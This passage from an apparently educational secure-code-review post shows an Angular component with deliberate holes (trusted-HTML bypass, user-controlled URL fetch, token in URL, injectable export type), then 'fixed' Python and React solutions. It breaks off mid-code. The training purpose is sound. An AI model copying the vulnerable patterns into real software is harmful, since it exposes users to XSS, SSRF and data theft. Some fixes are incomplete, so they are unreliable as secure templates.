class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nl">searchResults</span><span class="p">:</span> <span class="nx">SafeHtml</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nl">patients</span><span class="p">:</span> <span class="kr">any</span><span class="p">[]</span> <span class="o">=</span> <span class="p">[];</span> <span class="nx">guidelinesUrl</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nl">guidelinesContent</span><span class="p">:</span> <span class="nx">SafeHtml</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nx">exportType</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nx">exportOutput</span> <span class="o">=</span> <span class="dl">''</span><span class="p">;</span> <span class="nf">constructor</span><span class="p">(</span><span class="k">private</span> <span class="nx">http</span><span class="p">:</span> <span class="nx">HttpClient</span><span class="p">,</span> <span class="k">private</span> <span class="nx">sanitizer</span><span class="p">:</span> <span class="nx">DomSanitizer</span><span class="p">)</span> <span class="p">{}</span> <span class="nf">search</span><span class="p">()</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">http</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s2">`/api/patients/search/?q=</span><span class="p">${</span><span class="k">this</span><span class="p">.</span><span class="nx">query</span><span class="p">}</span><span class="s2">`</span><span class="p">,</span> <span class="p">{</span> <span class="na">responseType</span><span class="p">:</span> <span class="dl">'</span><span class="s1">text</span><span class="dl">'</span> <span class="p">})</span> <span class="p">.</span><span class="nf">subscribe</span><span class="p">(</span><span class="nx">html</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">searchResults</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">sanitizer</span><span class="p">.</span><span class="nf">bypassSecurityTrustHtml</span><span class="p">(</span><span class="nx">html</span><span class="p">);</span> <span class="p">});</span> <span class="p">}</span> <span class="nf">fetchGuidelines</span><span class="p">()</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">http</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s2">`/api/guidelines/fetch/?url=</span><span class="p">${</span><span class="k">this</span><span class="p">.</span><span class="nx">guidelinesUrl</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">.</span><span class="nf">subscribe</span><span class="p">((</span><span class="nx">res</span><span class="p">:</span> <span class="kr">any</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">guidelinesContent</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">sanitizer</span><span class="p">.</span><span class="nf">bypassSecurityTrustHtml</span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">content</span><span class="p">);</span> <span class="p">});</span> <span class="p">}</span> <span class="nf">downloadLab</span><span class="p">(</span><span class="nx">patientId</span><span class="p">:</span> <span class="kr">number</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">token</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nf">getItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">auth_token</span><span class="dl">'</span><span class="p">);</span> <span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="s2">`/api/lab-results/download/?file=</span><span class="p">${</span><span class="nx">patientId</span><span class="p">}</span><span class="s2">_result.pdf&amp;token=</span><span class="p">${</span><span class="nx">token</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="p">}</span> <span class="nf">runExport</span><span class="p">()</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">http</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="s2">`/api/reports/export/?type=</span><span class="p">${</span><span class="k">this</span><span class="p">.</span><span class="nx">exportType</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">.</span><span class="nf">subscribe</span><span class="p">((</span><span class="nx">res</span><span class="p">:</span> <span class="kr">any</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">exportOutput</span> <span class="o">=</span> <span class="nx">res</span><span class="p">.</span><span class="nx">output</span><span class="p">;</span> <span class="p">});</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h2> My Solutions </h2> <blockquote> <p>⚠️ <strong>Stop scrolling if you haven't attempted the exercises.</strong> Solutions below.</p> </blockquote> <h3> Solution — Exercise 1 </h3> <p><strong>Bugs found:</strong> SQL Injection, DOM XSS, IDOR (missing auth)</p> <p><strong><code>main.py</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span><span class="p">,</span> <span class="n">Form</span><span class="p">,</span> <span class="n">HTTPException</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="kn">from</span> <span class="n">sqlalchemy</span> <span class="kn">import</span> <span class="n">text</span> <span class="kn">from</span> <span class="n">pydantic</span> <span class="kn">import</span> <span class="n">BaseModel</span> <span class="k">class</span> <span class="nc">LoginRequest</span><span class="p">(</span><span class="n">BaseModel</span><span class="p">):</span> <span class="n">username</span><span class="p">:</span> <span class="nb">str</span> <span class="n">password</span><span class="p">:</span> <span class="nb">str</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/user</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">get_user</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">body</span><span class="p">:</span> <span class="n">LoginRequest</span><span class="p">):</span> <span class="n">user</span> <span class="o">=</span> <span class="n">body</span><span class="p">.</span><span class="n">username</span> <span class="n">passwd</span> <span class="o">=</span> <span class="n">body</span><span class="p">.</span><span class="n">password</span> <span class="k">if</span> <span class="ow">not</span> <span class="nf">authenticate_user</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">passwd</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">Exception</span><span class="p">(</span><span class="sh">"</span><span class="s">Invalid Credentials</span><span class="sh">"</span><span class="p">)</span> <span class="n">query</span> <span class="o">=</span> <span class="sh">"</span><span class="s">SELECT * FROM users WHERE username = :user</span><span class="sh">"</span> <span class="n">result</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="n">session</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="nf">text</span><span class="p">(</span><span class="n">query</span><span class="p">),</span> <span class="p">{</span><span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">:</span> <span class="n">user</span><span class="p">}).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">results.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">results</span><span class="sh">"</span><span class="p">:</span> <span class="n">result</span><span class="p">})</span> </code></pre> </div> <p><strong><code>UserSearch.jsx</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">useState</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">UserSearch</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">username</span><span class="p">,</span> <span class="nx">setUsername</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">password</span><span class="p">,</span> <span class="nx">setPassword</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">searchUser</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">user_regex</span> <span class="o">=</span> <span class="sr">/^</span><span class="se">[</span><span class="sr">a-zA-Z0-9-_.</span><span class="se">]</span><span class="sr">+$/</span><span class="p">;</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">user_regex</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">username</span><span class="p">))</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">"</span><span class="s2">Invalid credentials</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/users</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">method</span><span class="p">:</span> <span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">application/json</span><span class="dl">'</span> <span class="p">},</span> <span class="na">body</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">({</span> <span class="nx">username</span><span class="p">,</span> <span class="nx">password</span> <span class="p">})</span> <span class="p">});</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">response</span><span class="p">.</span><span class="nx">ok</span><span class="p">)</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="s2">`HTTP error! status: </span><span class="p">${</span><span class="nx">response</span><span class="p">.</span><span class="nx">status</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">resp</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">text</span><span class="p">();</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">results</span><span class="dl">'</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">resp</span><span class="p">;</span> <span class="p">};</span> <span class="k">return </span><span class="p">(</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="p">=</span><span class="s">"text"</span> <span class="na">value</span><span class="p">=</span><span class="si">{</span><span class="nx">username</span><span class="si">}</span> <span class="na">onChange</span><span class="p">=</span><span class="si">{</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">setUsername</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span><span class="si">}</span> <span class="na">placeholder</span><span class="p">=</span><span class="s">"Enter username"</span> <span class="p">/&gt;</span> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="p">=</span><span class="s">"password"</span> <span class="na">value</span><span class="p">=</span><span class="si">{</span><span class="nx">password</span><span class="si">}</span> <span class="na">onChange</span><span class="p">=</span><span class="si">{</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">setPassword</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span><span class="si">}</span> <span class="na">placeholder</span><span class="p">=</span><span class="s">"Enter password"</span> <span class="p">/&gt;</span> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="nx">searchUser</span><span class="si">}</span><span class="p">&gt;</span>Search<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">id</span><span class="p">=</span><span class="s">"results"</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> Solution — Exercise 2 </h3> <p><strong>Bugs found:</strong> Hardcoded secret, Path Traversal, SQLi (×2), Missing Auth, DOM XSS, No Rate Limiting, <code>debug=True</code></p> <p><strong><code>app.py</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">flask_wtf.csrf</span> <span class="kn">import</span> <span class="n">CSRFProtect</span> <span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">url_for</span><span class="p">,</span> <span class="n">session</span><span class="p">,</span> <span class="n">flash</span><span class="p">,</span> <span class="n">jsonify</span> <span class="kn">from</span> <span class="n">flask_limiter</span> <span class="kn">import</span> <span class="n">Limiter</span> <span class="kn">from</span> <span class="n">flask_limiter.util</span> <span class="kn">import</span> <span class="n">get_remote_address</span> <span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">from</span> <span class="n">dotenv</span> <span class="kn">import</span> <span class="n">load_dotenv</span> <span class="nf">load_dotenv</span><span class="p">()</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">csrf</span> <span class="o">=</span> <span class="nc">CSRFProtect</span><span class="p">(</span><span class="n">app</span><span class="p">)</span> <span class="n">limiter</span> <span class="o">=</span> <span class="nc">Limiter</span><span class="p">(</span><span class="n">get_remote_address</span><span class="p">,</span> <span class="n">app</span><span class="o">=</span><span class="n">app</span><span class="p">,</span> <span class="n">default_limits</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">5 per minute</span><span class="sh">"</span><span class="p">],</span> <span class="n">storage_uri</span><span class="o">=</span><span class="sh">"</span><span class="s">memory://</span><span class="sh">"</span><span class="p">)</span> <span class="n">app</span><span class="p">.</span><span class="n">secret_key</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">SECRET_KEY</span><span class="sh">'</span><span class="p">)</span> <span class="n">app</span><span class="p">.</span><span class="n">config</span><span class="p">[</span><span class="sh">'</span><span class="s">UPLOAD_FOLDER</span><span class="sh">'</span><span class="p">]</span> <span class="o">=</span> <span class="sh">'</span><span class="s">uploads</span><span class="sh">'</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/upload</span><span class="sh">'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">])</span> <span class="nd">@limiter.limit</span><span class="p">(</span><span class="sh">"</span><span class="s">5 per minute</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">upload_file</span><span class="p">():</span> <span class="k">if</span> <span class="sh">'</span><span class="s">file</span><span class="sh">'</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">request</span><span class="p">.</span><span class="n">files</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">No file uploaded</span><span class="sh">"</span><span class="p">,</span> <span class="mi">400</span> <span class="nb">file</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">files</span><span class="p">[</span><span class="sh">'</span><span class="s">file</span><span class="sh">'</span><span class="p">]</span> <span class="k">if</span> <span class="nb">file</span><span class="p">.</span><span class="n">filename</span> <span class="o">==</span> <span class="sh">''</span><span class="p">:</span> <span class="k">return</span> <span class="sh">"</span><span class="s">No file selected</span><span class="sh">"</span><span class="p">,</span> <span class="mi">400</span> <span class="n">cookie_value</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">cookies</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">session</span><span class="sh">'</span><span class="p">)</span> <span class="n">session_data</span> <span class="o">=</span> <span class="nf">verify_session_cookie</span><span class="p">(</span><span class="n">cookie_value</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">session_data</span><span class="p">:</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">error</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">Unauthorized</span><span class="sh">"</span><span class="p">}),</span> <span class="mi">401</span> <span class="n">base_dir</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">abspath</span><span class="p">(</span><span class="sh">'</span><span class="s">uploads</span><span class="sh">'</span><span class="p">)</span> <span class="n">pwd_file</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">abspath</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">base_dir</span><span class="p">,</span> <span class="nb">file</span><span class="p">.</span><span class="n">filename</span><span class="p">))</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">pwd_file</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="n">base_dir</span> <span class="o">+</span> <span class="n">os</span><span class="p">.</span><span class="n">sep</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">Exception</span><span class="p">(</span><span class="sh">"</span><span class="s">Invalid filepath</span><span class="sh">"</span><span class="p">)</span> <span class="nb">file</span><span class="p">.</span><span class="nf">save</span><span class="p">(</span><span class="n">pwd_file</span><span class="p">)</span> <span class="k">return</span> <span class="sh">"</span><span class="s">File uploaded successfully!</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/search</span><span class="sh">'</span><span class="p">)</span> <span class="nd">@limiter.limit</span><span class="p">(</span><span class="sh">"</span><span class="s">5 per minute</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search_posts</span><span class="p">():</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">q</span><span class="sh">'</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">'</span><span class="s">database.db</span><span class="sh">'</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT * FROM posts WHERE title LIKE ?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="sh">'</span><span class="s">%</span><span class="sh">'</span> <span class="o">+</span> <span class="n">query</span> <span class="o">+</span> <span class="sh">'</span><span class="s">%</span><span class="sh">'</span><span class="p">,))</span> <span class="n">results</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">'</span><span class="s">results.html</span><span class="sh">'</span><span class="p">,</span> <span class="n">results</span><span class="o">=</span><span class="n">results</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/profile</span><span class="sh">'</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">'</span><span class="s">POST</span><span class="sh">'</span><span class="p">])</span> <span class="nd">@limiter.limit</span><span class="p">(</span><span class="sh">"</span><span class="s">5 per minute</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">update_profile</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">session</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">username</span><span class="sh">'</span><span class="p">)</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">'</span><span class="s">password</span><span class="sh">'</span><span class="p">]</span> <span class="n">cookie_value</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">cookies</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">session</span><span class="sh">'</span><span class="p">)</span> <span class="n">session_data</span> <span class="o">=</span> <span class="nf">verify_session_cookie</span><span class="p">(</span><span class="n">cookie_value</span><span class="p">)</span> <span class="n">new_email</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="sh">'</span><span class="s">email</span><span class="sh">'</span><span class="p">]</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">'</span><span class="s">database.db</span><span class="sh">'</span><span class="p">)</span> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">cursor</span><span class="p">()</span> <span class="k">if</span> <span class="ow">not</span> <span class="nf">authenticate_user</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="k">raise</span> <span class="nc">Exception</span><span class="p">(</span><span class="sh">"</span><span class="s">Invalid Credentials</span><span class="sh">"</span><span class="p">)</span> <span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">UPDATE users SET email = ? WHERE username = ?</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">new_email</span><span class="p">,</span> <span class="n">username</span><span class="p">))</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">flash</span><span class="p">(</span><span class="sh">'</span><span class="s">Profile updated!</span><span class="sh">'</span><span class="p">)</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="nf">url_for</span><span class="p">(</span><span class="sh">'</span><span class="s">profile</span><span class="sh">'</span><span class="p">))</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">'</span><span class="s">__main__</span><span class="sh">'</span><span class="p">:</span> <span class="n">app</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">debug</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span> </code></pre> </div> <p><strong><code>Search.jsx</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight jsx"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">useState</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react</span><span class="dl">'</span><span class="p">;</span> <span class="k">export</span> <span class="k">default</span> <span class="kd">function</span> <span class="nf">Search</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">[</span><span class="nx">query</span><span class="p">,</span> <span class="nx">setQuery</span><span class="p">]</span> <span class="o">=</span> <span class="nf">useState</span><span class="p">(</span><span class="dl">''</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">handleSearch</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">query</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/search?q=</span><span class="p">${</span><span class="nx">query</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">resp</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">text</span><span class="p">();</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">results</span><span class="dl">'</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">resp</span><span class="p">;</span> <span class="p">};</span> <span class="k">return </span><span class="p">(</span> <span class="p">&lt;</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">input</span> <span class="na">type</span><span class="p">=</span><span class="s">"text"</span> <span class="na">value</span><span class="p">=</span><span class="si">{</span><span class="nx">query</span><span class="si">}</span> <span class="na">onChange</span><span class="p">=</span><span class="si">{</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">setQuery</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)</span><span class="si">}</span> <span class="na">placeholder</span><span class="p">=</span><span class="s">"Search posts..."</span> <span class="p">/&gt;</span> <span class="p">&lt;</span><span class="nt">button</span> <span class="na">onClick</span><span class="p">=</span><span class="si">{</span><span class="nx">handleSearch</span><span class="si">}</span><span class="p">&gt;</span>Search<span class="p">&lt;/</span><span class="nt">button</span><span class="p">&gt;</span> <span class="p">&lt;</span><span class="nt">div</span> <span class="na">id</span><span class="p">=</span><span class="s">"results"</span><span class="p">&gt;&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">&lt;/</span><span class="nt">div</span><span class="p">&gt;</span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> Solution — Exercise 3 </h3> <p><strong>Bugs found:</strong> Hardcoded secrets (×2), SSRF, SQLi + plaintext password in login, JWT no failure handling, JWT 365-day expiry, OS Command Injection, Path Traversal, No Rate Limiting, DOM XSS</p> <p><strong><code>app.py</code> — Fixed</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span><span class="p">,</span> <span class="n">Form</span><span class="p">,</span> <span class="n">HTTPException</span><span class="p">,</span> <span class="n">status</span><span class="p">,</span> <span class="n">Depends</span> <span class="kn">from</span> <span class="n">fastapi.responses</span> <span class="kn">import</span> <span class="n">JSONResponse</span> <span class="kn">from</span> <span class="n">fastapi.security</span> <span class="kn">import</span> <span class="n">OAuth2PasswordBearer</span> <span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">File</span><span class="p">,</span> <span class="n">UploadFile</span> <span class="kn">from</span> <span class="n">slowapi</span> <span class="kn">import</span> <span class="n">Limiter</span><span class="p">,</span> <span class="n">_rate_limit_exceeded_handler</span> <span class="kn">from</span> <span class="n">slowapi.util</span> <span class="kn">import</span> <span class="n">get_remote_address</span> <span class="kn">from</span> <span class="n">slowapi.errors</span> <span class="kn">import</span> <span class="n">RateLimitExceeded</span> <span class="kn">from</span> <span class="n">passlib.hash</span> <span class="kn">import</span> <span class="n">argon2</span> <span class="kn">from</span> <span class="n">jose</span> <span class="kn">import</span> <span class="n">jwt</span> <span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">import</span> <span class="n">os</span> <span class="kn">import</span> <span class="n">subprocess</span> <span class="kn">import</span> <span class="n">shlex</span> <span class="kn">from</span> <span class="n">dotenv</span> <span class="kn">import</span> <span class="n">load_dotenv</span> <span class="kn">from</span> <span class="n">datetime</span> <span class="kn">import</span> <span class="n">datetime</span><span class="p">,</span> <span class="n">timedelta</span> <span class="nf">load_dotenv</span><span class="p">()</span> <span class="n">SECRET_KEY</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="nf">getenv</span><span class="p">(</span><span class="sh">'</span><span class="s">SECRET_KEY</span><span class="sh">'</span><span class="p">)</span> <span class="n">limiter</span> <span class="o">=</span> <span class="nc">Limiter</span><span class="p">(</span><span class="n">key_func</span><span class="o">=</span><span class="n">get_remote_address</span><span class="p">)</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">app</span><span class="p">.</span><span class="n">state</span><span class="p">.</span><span class="n">limiter</span> <span class="o">=</span> <span class="n">limiter</span> <span class="n">app</span><span class="p">.</span><span class="nf">add_exception_handler</span><span class="p">(</span><span class="n">RateLimitExceeded</span><span class="p">,</span> <span class="n">_rate_limit_exceeded_handler</span><span class="p">)</span> <span class="n">oauth2_scheme</span> <span class="o">=</span> <span class="nc">OAuth2PasswordBearer</span><span class="p">(</span><span class="n">tokenUrl</span><span class="o">=</span><span class="sh">"</span><span class="s">token</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">create_access_token</span><span class="p">(</span><span class="n">data</span><span class="p">:</span> <span class="nb">dict</span><span class="p">):</span> <span class="n">to_encode</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">copy</span><span class="p">()</span> <span class="n">expire</span> <span class="o">=</span> <span class="n">datetime</span><span class="p">.</span><span class="nf">utcnow</span><span class="p">()</span> <span class="o">+</span> <span 